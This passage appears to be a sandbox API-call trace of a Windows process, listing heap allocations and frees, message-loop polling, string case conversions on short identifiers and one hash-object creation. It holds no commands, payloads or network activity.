hHeap=0x25c0000) returned 1 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.602] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.605] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0265.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.607] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.607] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0265.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.608] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0265.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0265.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.608] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.608] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0265.608] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0265.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0265.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0265.609] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0265.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.609] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0265.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0265.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.610] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.610] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0265.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0265.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.612] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.612] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.612] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.612] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.612] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0265.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.613] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.613] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.613] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.613] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.613] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.613] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.614] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.614] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.614] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.614] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.614] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0265.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.615] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0265.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.615] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.615] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.615] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.615] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.615] PeekMessageW (in: 